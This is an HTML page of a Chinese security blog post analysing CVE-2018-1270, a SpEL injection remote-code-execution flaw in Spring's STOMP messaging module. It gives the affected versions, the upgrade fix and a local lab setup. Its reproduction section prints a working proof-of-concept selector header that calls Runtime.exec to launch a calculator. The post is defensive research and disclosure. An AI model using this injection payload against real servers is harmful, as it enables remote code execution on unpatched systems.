spring-messaging-rce-cve-2018-1270.html

<!doctype html>
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]-->
<!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<![endif]-->
<head>
<meta charset="utf-8">
<title>SpringMessaging命令执行漏洞 - CVE-2018-1270 &#8211; KINGX</title>
<meta name="description" content="Vulnerabilities">
<meta name="keywords" content="Vulnerability, 漏洞分析">

<!-- Twitter Cards -->
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kingx.me/images/">
<meta name="twitter:title" content="SpringMessaging命令执行漏洞 - CVE-2018-1270">
<meta name="twitter:description" content="Vulnerabilities">
<meta name="twitter:creator" content="@https://twitter.com/KINGX_CN">

<!-- Open Graph -->
<meta property="og:locale" content="en_US">
<meta property="og:type" content="article">
<meta property="og:title" content="SpringMessaging命令执行漏洞 - CVE-2018-1270">
<meta property="og:description" content="Vulnerabilities">
<meta property="og:url" content="https://kingx.me/spring-messaging-rce-cve-2018-1270.html">
<meta property="og:site_name" content="KINGX">





<link rel="canonical" href="https://kingx.me/spring-messaging-rce-cve-2018-1270.html">
<link href="https://kingx.me/feed.xml" type="application/atom+xml" rel="alternate" title="KINGX Feed">

<!-- http://t.co/dKP3o1e -->
<meta name="HandheldFriendly" content="True">
<meta name="MobileOptimized" content="320">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<!-- For all browsers -->
<link rel="stylesheet" href="https://kingx.me/assets/css/main.css">
<!-- Webfonts -->
<link href="//fonts.googleapis.com/css?family=Lato:300,400,700,300italic,400italic" rel="stylesheet" type="text/css">

<meta http-equiv="cleartype" content="on">

<!-- Load Modernizr -->
<script src="https://kingx.me/assets/js/vendor/modernizr-2.6.2.custom.min.js"></script>

<!-- Icons -->
<!-- 16x16 -->
<link rel="shortcut icon" href="https://kingx.me/favicon.ico">
<!-- 32x32 -->
<link rel="shortcut icon" href="https://kingx.me/favicon.png">
<!-- 57x57 (precomposed) for iPhone 3GS, pre-2011 iPod Touch and older Android devices -->
<link rel="apple-touch-icon-precomposed" href="https://kingx.me/images/apple-touch-icon-precomposed.png">
<!-- 72x72 (precomposed) for 1st generation iPad, iPad 2 and iPad mini -->
<link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://kingx.me/images/apple-touch-icon-72x72-precomposed.png">
<!-- 114x114 (precomposed) for iPhone 4, 4S, 5 and post-2011 iPod Touch -->
<link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://kingx.me/images/apple-touch-icon-114x114-precomposed.png">
<!-- 144x144 (precomposed) for iPad 3rd and 4th generation -->
<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://kingx.me/images/apple-touch-icon-144x144-precomposed.png">




<style type="text/css">body {background-image:url(https://kingx.me/images/triangular.png);}</style>


</head>

<body id="post" >

<!--[if lt IE 9]><div class="upgrade"><strong><a href="http://whatbrowser.org/">Your browser is quite old!</strong> Why not upgrade to a different browser to better enjoy this site?</a></div><![endif]-->
<nav id="dl-menu" class="dl-menuwrapper" role="navigation">
	<button class="dl-trigger">Open Menu</button>
	<ul class="dl-menu">
		<li><a href="https://kingx.me/">Home</a></li>
		<li>
			<a href="#">About</a>
			<ul class="dl-submenu">
				<li>
					<img src="https://kingx.me/images/avatar.jpg" alt="KINGX photo" class="author-photo">
					<h4>KINGX</h4>
					<p>What is Security</p>
				</li>
				<li><a href="https://kingx.me/about/"><span class="btn btn-inverse">Learn More</span></a></li>
				<li>
					<a href="mailto:root#kingx.me"><i class="fa fa-fw fa-envelope"></i> Email</a>
				</li>
				<li>
					<a href="https://twitter.com/KINGX_CN"><i class="fa fa-fw fa-twitter"></i> Twitter</a>
				</li>
				<li>
					<a href="https://weibo.com/u/1624430122"><i class="fa fa-fw fa-weibo"></i> Weibo</a>
				</li>
				
				
				
				<li>
					<a href="https://github.com/KINGX-Code"><i class="fa fa-fw fa-github"></i> GitHub</a>
				</li>
				
				
				
				
			</ul><!-- /.dl-submenu -->
		</li>
		<!-- <li>
			<a href="#">Posts</a>
			<ul class="dl-submenu">
				<li><a href="https://kingx.me/posts/">All Posts</a></li>
				<li><a href="https://kingx.me/tags/">All Tags</a></li>
			</ul>
		</li> -->
		
	    
	    <li><a href="https://kingx.me/latest-events/" >Security Incidents</a></li>
	  
	    
	    <li><a href="https://kingx.me/latest-vulns/" >Vulnerabilities</a></li>
	  
	    
	    <li><a href="https://kingx.me/pentest-tools/" >Red Team</a></li>
	  
	    
	    <li><a href="https://kingx.me/cheatsheet/" >CheatSheet</a></li>
	  
	    
	    <li><a href="https://kingx.me/stop-learning/" >Stop Learning</a></li>
	  
	    
	    <li><a href="https://kingx.me/posts/" >Archives</a></li>
	  
	    
	    <li><a href="https://kingx.me/tags/" >Tags</a></li>
	  
	    
	    <li><a href="https://kingx.me/links/" >Links</a></li>
	  
	    
	    <li><a href="https://kingx.me/feed.xml" >RSS</a></li>
	  
	</ul><!-- /.dl-menu -->
</nav><!-- /.dl-menuwrapper -->




<div id="main" role="main">
  <article class="hentry">
    <header class="header-title">
      <div class="header-title-wrap">
        
          <h1 class="entry-title"><a href="https://kingx.me/spring-messaging-rce-cve-2018-1270.html" rel="bookmark" title="SpringMessaging命令执行漏洞 - CVE-2018-1270">SpringMessaging命令执行漏洞 - CVE-2018-1270</a></h1>
        
        <h2><span class="entry-date date published"><time datetime="2018-04-08T00:00:00-04:00">April 08, 2018, KINGX</time></span></h2>
        
        <p class="entry-reading-time">
          <i class="fa fa-clock-o"></i>
          
Reading time ~1 minute
          
          <span id="busuanzi_container_page_pv">
             / Page View <span id="busuanzi_value_page_pv">0</span> / Site Visitor <span id="busuanzi_value_site_uv">0</span>
          </span>
          
        </p><!-- /.entry-reading-time -->
        

      </div><!-- /.header-title-wrap -->
    </header>
    <div class="entry-content">
      <span class="entry-tags" style="color:red;font-size:13px;margin-bottom: 0px;">「声明：本博客中涉及到的相关漏洞均为官方已经公开并修复的漏洞，涉及到的安全技术也仅用于企业安全建设和安全对抗研究。本文仅限业内技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。」</span>
      <h2 id="漏洞概述">漏洞概述</h2>
<p><a href="https://pivotal.io/security/cve-2018-1270">https://pivotal.io/security/cve-2018-1270</a></p>

<p>STOMP（Simple Text Orientated Messaging Protocol）全称为简单文本定向消息协议，它是一种在客户端与中转服务端（消息代理Broker）之间进行异步消息传输的简单通用协议，它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。STOMP协议规范：<a href="https://stomp.github.io/stomp-specification-1.0.html">https://stomp.github.io/stomp-specification-1.0.html</a></p>

<p>Spring框架中的 <strong>spring-messaging</strong> 模块提供了一种基于WebSocket的STOMP协议实现，STOMP消息代理在处理客户端消息时存在SpEL表达式注入漏洞，攻击者可以通过构造恶意的消息来实现远程代码执行。</p>

<p>影响范围：SpringFramework 5.0 ~ 5.0.4，4.3 ~ 4.3.14，以及停止维护的更老版本均受影响</p>

<p>最新安全公告：https://pivotal.io/security/cve-2018-1275</p>

<p>修复方案：</p>

<p>1.请升级Spring框架到最新版本(5.0.5、4.3.15及以上版本);</p>

<p>2.如果你在用 SpringBoot，请升级到最新版本(2.0.1及以上版本);</p>

<p>同时Spring还修复其他两个漏洞，有兴趣的朋友可以自行分析下：
<a href="https://pivotal.io/security/cve-2018-1271">https://pivotal.io/security/cve-2018-1271</a>
<a href="https://pivotal.io/security/cve-2018-1272">https://pivotal.io/security/cve-2018-1272</a></p>

<h2 id="环境搭建">环境搭建</h2>

<p>搭建指南：<a href="https://spring.io/guides/gs/intellij-idea/">https://spring.io/guides/gs/intellij-idea/</a></p>

<p>示例项目：<a href="https://github.com/spring-guides/gs-messaging-stomp-websocket">https://github.com/spring-guides/gs-messaging-stomp-websocket</a></p>

<p>下载示例环境代码：</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/spring-guides/gs-messaging-stomp-websocket
git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3
</code></pre></div></div>

<p>打开IntelliJ IDEA，在欢迎界面点击Import Project，选择刚下载的<code class="highlighter-rouge">gs-messaging-stomp-websocket</code>示例程序中<code class="highlighter-rouge">complete</code>项目下的Maven <strong>pom.xml</strong>文件，进行导入，一顿Next操作之后，IDEA会创建一个可以直接运行的项目。</p>

<p>点击运行，启动Spring Boot服务，访问http://localhost:8080/。
<img src="https://kingx.me/images/articles/201804/spring-messaging-run.png" alt="Run" /></p>

<p><img src="https://kingx.me/images/articles/201804/spring-messaging-web.png" alt="界面" /></p>

<h2 id="漏洞复现">漏洞复现</h2>

<p>篡改前端app.js中Websocket connect函数中，插入恶意selector代码，PoC如下：</p>

<p>For Mac</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">header</span>  <span class="o">=</span> <span class="p">{</span><span class="s2">"selector"</span><span class="p">:</span><span class="s2">"T(java.lang.Runtime).getRuntime().exec('open /Applications/Calculator.app')"</span><span class="p">};</span>
</code></pre></div></div>

<p>For Windows</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">header</span>  <span class="o">=</span> <span class="p">{</span><span class="s2">"selector"</span><span class="p">:</span><span class="s2">"T(java.lang.Runtime).getRuntime().exec('calc.exe')"</span><span class="p">};</span>
</code></pre></div></div>

<p><img src="https://kingx.me/images/articles/201804/spring-messaging-poc.png" alt="PoC" /></p>

<p>在Web界面上点击Connect，然后随便Send几个字符。</p>

<p><img src="https://kingx.me/images/articles/201804/spring-messaging-poc2.jpg" alt="PoC2" /></p>

<p>修复测试，我们将pom.xml中的org.springframework.boot设置到2.0.1版本，org.springframework.boot中会引用5.0.5版本的Spring框架。再测试则会发现漏洞已经无法利用了。pom.xml：</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    ...
    &lt;parent&gt;
        &lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;
        &lt;artifactId&gt;spring-boot-starter-parent&lt;/artifactId&gt;
        &lt;version&gt;2.0.1.RELEASE&lt;/version&gt;
    &lt;/parent&gt;
    ...
</code></pre></div></div>

<h2 id="漏洞分析">漏洞分析</h2>
<p>根据官方描述，漏洞在<strong>spring-messaging</strong>包中，下载<code class="highlighter-rouge">spring-messaging 5.0.4</code>和<code class="highlighter-rouge">5.0.5</code>版本源码：</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://central.maven.org/maven2/org/springframework/spring-messaging/5.0.5.RELEASE/
http://central.maven.org/maven2/org/springframework/spring-messaging/5.0.4.RELEASE/
</code></pre></div></div>

<p>对比代码变动，可以看到主要集中在<code class="highlighter-rouge">simp/broker</code>和<code class="highlighter-rouge">simp/stomp</code>目录下：
<img src="https://kingx.me/images/articles/201804/spring-messaging-diff.png" alt="diff" /></p>

<p><strong>spring-messaging</strong> 模块提供了一种基于WebSocket的STOMP协议实现，查看STOMP协议文档：<a href="https://stomp.github.io/stomp-specification-1.0.html">https://stomp.github.io/stomp-specification-1.0.html</a></p>

<p>历史上Spring的多个命令执行漏洞均优于SpEL表达式引起，比如前段时间的Spring Data REST RCE漏洞<a href="https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA">https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA</a>。可以看到STOMP协议规范中，</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Stomp brokers may support the selector header which allows you to specify an SQL 92 selector on the message headers which acts as a filter for content based routing.

You can also specify an id header which can then later on be used to UNSUBSCRIBE from the specific subscription as you may end up with overlapping subscriptions using selectors with the same destination. If an id header is supplied then Stomp brokers should append a subscription header to any MESSAGE commands which are sent to the client so that the client knows which subscription the message relates to. If using Wildcards and selectors this can help clients figure out what subscription caused the message to be created.
</code></pre></div></div>

<p>研究Spring对基于WebSocket的STOMP协议的具体实现：<a href="https://blog.csdn.net/pacosonswjtu/article/details/51914567">https://blog.csdn.net/pacosonswjtu/article/details/51914567</a></p>

<p>跟一下selector这个点。</p>

<p>示例项目中的Broker有个’/hello’的入口点，我们在GreetingController的greeting方法里下个断点，跟一下消息交互的处理流程。Connect之后，在页面上点击Send，</p>

<p>GreetingController.greeting() -&gt; InvocableHandlerMethod.doInoke() -&gt; InvocableHandlerMethod.invoke() -&gt; AbstractMethodMessageHandler.handleMatch() -&gt; HandlerMethodReturnValueHandlerComposite returnValueHandlers.handleReturnValue()</p>

<p>handleReturnValue()</p>

<h2 id="相关知识---websocket">相关知识 - WebSocket</h2>
<p>TODO</p>

<h2 id="references">References</h2>
<ul>
  <li><a href="https://threathunter.org/topic/5ac8cef0ec721b1f1966f54c">https://threathunter.org/topic/5ac8cef0ec721b1f1966f54c</a></li>
  <li><a href="https://xz.aliyun.com/t/2252">https://xz.aliyun.com/t/2252</a></li>
  <li><a href="https://github.com/CaledoniaProject/CVE-2018-1270">https://github.com/CaledoniaProject/CVE-2018-1270</a></li>
  <li>使用WebSocket 和 STOMP 实现消息功能 <a href="https://blog.csdn.net/pacosonswjtu/article/details/51914567">https://blog.csdn.net/pacosonswjtu/article/details/51914567</a></li>
</ul>

      <footer class="entry-meta">
        <span class="entry-tags" style="color:black;font-size:13px;margin-bottom: 0px;">欢迎订阅我的微信公众号</span>
        <img src="/images/secengine.jpg" alt="welcome subscribe"/>
        <span class="entry-tags"><a href="https://kingx.me/tags/#Vulnerability" title="Pages tagged Vulnerability" class="tag"><span class="term">Vulnerability</span></a><a href="https://kingx.me/tags/#漏洞分析" title="Pages tagged 漏洞分析" class="tag"><span class="term">漏洞分析</span></a></span>
        
        <div class="social-share">
  <ul class="socialcount socialcount-small inline-list">
    <li class="weibo"><a href="http://service.weibo.com/share/share.php?title=分享KINGX的文章《SpringMessaging命令执行漏洞 - CVE-2018-1270》&url=https://kingx.me/spring-messaging-rce-cve-2018-1270.html&source=bookmark" title="Share on Weibo" target="_blank"><span class="count"><i class="fa fa-weibo"></i> WEIBO</span></a></li>
    <li class="facebook"><a href="https://www.facebook.com/sharer/sharer.php?u=https://kingx.me/spring-messaging-rce-cve-2018-1270.html" title="Share on Facebook"><span class="count"><i class="fa fa-facebook-square"></i> Like</span></a></li>
    <li class="twitter"><a href="https://twitter.com/intent/tweet?text=https://kingx.me/spring-messaging-rce-cve-2018-1270.html" title="Share on Twitter"><span class="count"><i class="fa fa-twitter-square"></i> Tweet</span></a></li>
    <li class="googleplus"><a href="https://plus.google.com/share?url=https://kingx.me/spring-messaging-rce-cve-2018-1270.html" title="Share on Google Plus"><span class="count"><i class="fa fa-google-plus-square"></i> +1</span></a></li>
  </ul>
</div><!-- /.social-share -->
<!--
<div class="ds-share" data-thread-key="/spring-messaging-rce-cve-2018-1270" data-title="SpringMessaging命令执行漏洞 - CVE-2018-1270" data-images="" data-content="SpringMessaging命令执行漏洞 - CVE-2018-1270" data-url="https://kingx.me/spring-messaging-rce-cve-2018-1270.html">
    <div class="ds-share-inline">
      <ul  class="ds-share-icons-16">
        <li data-toggle="ds-share-icons-more"><a class="ds-more" href="javascript:void(0);">分享到：</a></li>
        <li><a class="ds-weibo" href="javascript:void(0);" data-service="weibo">微博</a></li>
        <li><a class="ds-qzone" href="javascript:void(0);" data-service="qzone">QQ空间</a></li>
        <li><a class="ds-qqt" href="javascript:void(0);" data-service="qqt">腾讯微博</a></li>
        <li><a class="ds-wechat" href="javascript:void(0);" data-service="wechat">微信</a></li>
      </ul>
      <div class="ds-share-icons-more">
      </div>
    </div>
</div>
-->
      </footer>
    </div><!-- /.entry-content -->
    
    

    <div class="read-more">
  
    <div class="read-more-header">
      
        <a href="https://kingx.me/you-dont-know-security-terms.html" class="read-more-btn">Read More</a>
      
    </div><!-- /.read-more-header -->
    <div class="read-more-content">
      
      <h3><a href="https://kingx.me/ai-driven-static-code-audit-vulnhuntr.html" title="探索 AI 驱动的代码安全工具 VulnHuntr">探索 AI 驱动的代码安全工具 VulnHuntr</a></h3>
      <p>Explore VulnHuntr <a href="https://kingx.me/ai-driven-static-code-audit-vulnhuntr.html">Continue reading</a></p>
      
    </div><!-- /.read-more-content -->
  
  <div class="read-more-list">
    
      
      <div class="list-item">
        <h4><a href="https://kingx.me/Patch-log4j.html" title="Log4j 严重漏洞修复方案参考 CVE-2021-44228">Log4j 严重漏洞修复方案参考 CVE-2021-44228</a></h4>
        <span>Published on December 12, 2021</span>
      </div><!-- /.list-item -->
      
    
      
      <div class="list-item">
        <h4><a href="https://kingx.me/Thinking-about-the-RedTeam-Engagement.html" title="浅谈大规模红蓝对抗攻与防">浅谈大规模红蓝对抗攻与防</a></h4>
        <span>Published on October 12, 2020</span>
      </div><!-- /.list-item -->
      
    
  </div><!-- /.read-more-list -->
</div><!-- /.read-more -->
  </article>
</div><!-- /#main -->

<div class="footer-wrapper">
  <footer role="contentinfo">
    <span>&copy; 2024 KINGX. Powered by Jekyll using the HPSTR Theme.</span>
  </footer>
</div><!-- /.footer-wrapper -->

<!--<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>-->
<!-- <script src="http://libs.baidu.com/jquery/1.9.1/jquery.min.js"></script> -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="https://kingx.me/assets/js/vendor/jquery-1.9.1.min.js"><\/script>')</script>
<script src="https://kingx.me/assets/js/scripts.min.js"></script>




<script>

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  if(location.host=="kingx.me"){
    hm.src = "https://hm.baidu.com/hm.js?d11d8512e0bc6992b9c9bbf2d266ce31";
  }else if(location.host=="kingx.sinaapp.com"){
    hm.src = "https://hm.baidu.com/hm.js?d1b3dbd97b73868454f102755fdf51ba";
  }
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>



<!-- Busuanzi Analytics -->
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



	        

</body>
</html>